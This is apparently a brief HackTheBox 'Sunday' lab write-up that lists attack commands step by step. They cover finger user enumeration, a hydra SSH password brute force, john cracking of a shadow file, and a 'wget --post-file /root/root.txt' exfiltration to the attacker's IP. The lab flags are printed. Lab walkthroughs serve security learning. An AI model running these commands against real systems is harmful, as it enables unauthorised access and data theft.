[HTB] Sunday Writeup
nmap -sC -sS -sV -O -p- -o scanResultFull.txt 10.129.152.134
finger service 공격
https://book.hacktricks.xyz/pentesting/pentesting-finger
79 - Pentesting Finger - HackTricks
Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known)
book.hacktricks.xyz
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.152.134sunny, sammy 계정 존재 확인
sunny 계정 패스워드 크랙 (sunday)
hydra -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.129.152.134 ssh -s 22022ssh sunny@10.129.152.134 -p 22022
/backup에서 shadow파일 내용 확인
sammy 계정 패스워드 크랙
john --wordlist=/usr/share/wordlists/rockyou.txt sammy.txt
sudo -l
wget --post-file /root/root.txt http://10.10.14.114:4321/
FLAG =
[user] a3d9498027ca5187ba1793943ee8a598
[root] fb40fab61d99d37536daeec0d97af9b8
-----------------------------------------------------------------------------------------------------------------------------------
추가 권한 상승 방법
https://0xdf.gitlab.io/2018/09/29/htb-sunday.html#overwrite
HTB: Sunday
Sunday is definitely one of the easier boxes on HackTheBox. It had a lot of fun concepts, but on a crowded server, they step on each other. We start by using finger to brute-force enumerate users, though once once person logs in, the answer is given to any
0xdf.gitlab.io